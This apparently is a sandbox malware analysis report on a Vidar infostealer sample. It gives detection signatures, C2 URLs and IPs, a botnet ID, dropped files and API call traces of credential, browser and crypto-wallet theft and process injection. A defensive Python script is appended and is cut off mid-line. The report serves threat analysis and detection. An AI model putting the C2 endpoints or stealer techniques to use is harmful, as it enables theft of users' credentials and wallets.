Windows Analysis Report
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Overview

General Information

Sample name: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Analysis ID: 1487424
MD5: 3cd180f72198597215cab492c109f5a0
SHA1: 01ceb31bfcb1f5d6eefffa5bf1c6cb891ca6dd75
SHA256: 5ad0e5d670206288abccd95bb0e3ff1ee9a889b49423cb5160c7c59912991a0d
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection

Source: https://168.119.176.241/r Avira URL Cloud: Label: malware
Source: https://168.119.176.241/s Avira URL Cloud: Label: malware
Source: https://168.119.176.241/t Avira URL Cloud: Label: malware
Source: https://168.119.176.241/qo Avira URL Cloud: Label: malware
Source: https://168.119.176.241/z:O Avira URL Cloud: Label: malware
Source: https://168.119.176.241/r5 Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges Avira URL Cloud: Label: malware
Source: https://168.119.176.241/259H Avira URL Cloud: Label: malware
Source: https://168.119.176.241/K Avira URL Cloud: Label: malware
Source: https://168.119.176.241/ECD Avira URL Cloud: Label: malware
Source: https://168.119.176.241/0 Avira URL Cloud: Label: malware
Source: https://168.119.176.241/RCHAR Avira URL Cloud: Label: malware
Source: https://168.119.176.241/8 Avira URL Cloud: Label: malware
Source: https://168.119.176.241/6 Avira URL Cloud: Label: malware
Source: https://168.119.176.241/$ Avira URL Cloud: Label: malware
Source: https://168.119.176.241/vcruntime140.dll Avira URL Cloud: Label: malware
Source: https://168.119.176.241/& Avira URL Cloud: Label: malware
Source: https://168.119.176.241/sqls.dllI Avira URL Cloud: Label: malware
Source: https://168.119.176.241/msvcp140.dll Avira URL Cloud: Label: malware
Source: https://168.119.176.241/sqls.dll_ Avira URL Cloud: Label: malware
Source: https://168.119.176.241/graphy Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/ Avira URL Cloud: Label: malware
Source: https://168.119.176.241 Avira URL Cloud: Label: malware
Source: https://168.119.176.241/nss3.dllf Avira URL Cloud: Label: malware
Source: https://168.119.176.241/41 Avira URL Cloud: Label: malware
Source: https://168.119.176.241/key% Avira URL Cloud: Label: malware
Source: https://168.119.176.241/(%f Avira URL Cloud: Label: malware
Source: https://168.119.176.241/s_1l Avira URL Cloud: Label: malware
Source: https://168.119.176.241/softokn3.dll Avira URL Cloud: Label: malware
Source: https://168.119.176.241/mozglue.dllU Avira URL Cloud: Label: malware
Source: https://168.119.176.241/Microsoft Avira URL Cloud: Label: malware
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "625d7a8e379321656ff1b88ebf9542b7"}
Source: arpdabl.zapto.org Virustotal: Detection: 12%
Source: https://168.119.176.241/0 Virustotal: Detection: 13%
Source: https://168.119.176.241/6 Virustotal: Detection: 13%
Source: https://168.119.176.241/8 Virustotal: Detection: 13%
Source: C:\ProgramData\EHDHIDAEHC.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe ReversingLabs: Detection: 36%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Virustotal: Detection: 60%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\EHDHIDAEHC.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D6D50 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_003D6D50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D6CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_003D6CD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D8980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA, 0_2_003D8980
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E0DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_003E0DF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C2A6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree, 6_2_00406D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 6_2_00406CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 6_2_00410DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00408980 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA, 6_2_00408980
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: minelabfoto.pdb( source: mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source: Binary string: minelabfoto.pdb source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source: Binary string: PE.pdbH] source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\kfqXL.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.000000000426C000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2098035068.0000000005634000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source: Binary string: PE.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: nss3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003D1110
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_003D99F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E5EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003E5EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003DC2E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_003DA2C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E56C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_003E56C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003DB390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E4F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 0_2_003E4F80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003D9D40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E5A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_003E5A70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_003DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 6_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 6_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 6_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 6_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 6_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 6_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_0040B390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E53C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 0_2_003E53C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_05A6D0C8
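The "Code function" entries above appear twice: once at 0_2_003Dxxxx inside the submitted payload and once at 6_2_0040xxxx inside MSBuild.exe, with the same API call sequences. Matching the entries by sequence and checking that every matched pair differs by one constant is a quick way to confirm what the "Injects a PE file into a foreign process" signature asserts, and the constant tells you where the injected image landed. The script below is an added example, not Joe Sandbox output; it embeds a subset of the report's own entries as its input. The interpretation that 0x400000 is the payload's preferred image base (0x3D1110 is base+0x1110 in process 0, 0x401110 is base+0x1110 in MSBuild) is an inference from the addresses, not something the report states. Note the one entry whose sequence differs between the two processes (0_2_003D8980 calls PK11SDR_Decrypt, 6_2_00408980 does not): the address still lands exactly at payload+delta, so the code is the same and only the resolved NSS imports differ.

```python
"""Show that MSBuild.exe is running a relocated copy of the payload's image.

Added example; not Joe Sandbox output.  Input is a subset of the report's
"Code function" entries for process 0 (the payload) and process 6
(MSBuild.exe).  Functions are matched by API call sequence and the address
delta between each matched pair is checked for consistency.
"""
import re
from collections import Counter

# Entries copied from the report above (subset).
PAYLOAD_FUNCS = """\
0_2_003D6D50 CryptUnprotectData,LocalAlloc,LocalFree,
0_2_003D6CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
0_2_003E0DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
0_2_003D8980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,
"""
MSBUILD_FUNCS = """\
6_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,
6_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
6_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
6_2_00408980 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,
"""

# <pid>_<n>_<addr> <api,api,...>[,]
ENTRY_RE = re.compile(r"^(\d+)_\d+_([0-9A-Fa-f]{8})\s+(.+?),?\s*$")


def parse_entries(text):
    """Map each API call sequence to its start address for one process.

    The sequence is the key, so two functions with identical sequences in
    the same process would collapse into one; that does not happen in the
    entries above, and a real tool would key on both."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries[tuple(m.group(3).split(","))] = int(m.group(2), 16)
    return entries


def relocation_check(src_text, dst_text):
    """Match functions across two processes and derive the image delta.

    Returns the dominant address delta, how many sequence-identical pairs
    agree with it, and the source functions whose sequence differs in the
    destination but whose address still lands at (addr + delta) there."""
    src, dst = parse_entries(src_text), parse_entries(dst_text)
    pairs = [(src[s], dst[s]) for s in src if s in dst]
    if not pairs:
        return None
    deltas = Counter(d - s for s, d in pairs)
    delta, agreeing = deltas.most_common(1)[0]
    dst_addrs = set(dst.values())
    relocated_only = sorted(
        (a, a + delta) for s, a in src.items()
        if s not in dst and a + delta in dst_addrs)
    return {"delta": delta, "matched": len(pairs), "agreeing": agreeing,
            "consistent": len(deltas) == 1, "relocated_only": relocated_only}


if __name__ == "__main__":
    r = relocation_check(PAYLOAD_FUNCS, MSBUILD_FUNCS)
    print(f"delta=0x{r['delta']:X} matched={r['matched']} "
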